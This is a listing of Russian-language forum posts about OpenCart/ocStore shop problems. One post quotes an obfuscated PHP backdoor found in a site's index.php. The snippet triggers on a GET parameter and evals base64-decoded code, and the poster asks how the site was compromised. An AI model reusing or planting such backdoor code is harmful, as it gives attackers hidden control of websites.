-
Similar Content
-
By insona10
Всем привет, использую сейчас стандартный бесплатный модуль от Яндекс Маркета и столкнулся с проблемой. Этот модуль выгружает все опции размеров товара на сайт, даже которых нет. Например есть 4 размера у товара, 1,2,3 - нет, а 4 - есть, вот модуль выгружает все размеры и соответственно, клиент переходящий с Маркета по карточке размера 1, попадает на карточку товара, где только размер 4, и цена дороже соответственно, из-за этого блокирует Маркет.
Нужно настроить, чтобы он брал данные о количестве из вкладки Опции карточки товаров? Или еще варианты, чтобы выгружал только те размеры, которые есть на сайте.
Очень желательно вот через этот модуль:
-
By sabero
Помогите, пожалуйста, как решить проблему. В дефолтном шаблоне (1 скрин) все подпункты в категории выдвигаются так, что их сразу видно. У меня же(2) они почему-то только со скроллом, и тот с чудовищной чувствительностью. Как решить проблему?
-
By Anton999
Приветствую!
Кто сталкивался? К index.php прицепилась такая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было прицеплено, мне пока не известна. Так жить дальше нельзя.
Возможно кто-то сталкивался с подобным, буду благодарен за дельный совет, как пролезли, как закрыть дыру.
Всем спасибо!
-
By jtgroup
Добрый день!
требуется начальная настройка сайта на поддомене. с последующим переносом на основной домен.
сайт на ocstore 3.0 шаблон лайтшоп. установлены модули мультиязычности и джеткэш.
1. в идеале запустить на php 7 сейчас php 5.6
1.1 настройка .htaccess , настройка https
2. проверка работоспособности ( сейчас при переходе в категории бросает снова на главную)
3. перенос сайта на основной домен. требуется чуть позже после того как я наполню сайт.
-
By Ehanes
Добрый день. Вопрос следующий: для отслеживания конверсий (целей) необходимо сделать кнопку "Показать телефон". Т.е. в шапке сайта телефон будет скрытый и отобразится только после клика клиента. Как это возможно реализовать? Если процесс трудоемкий - пишите в личку - обсудим вознаграждение.
-
-
Recently Browsing 0 members
No registered users viewing this page.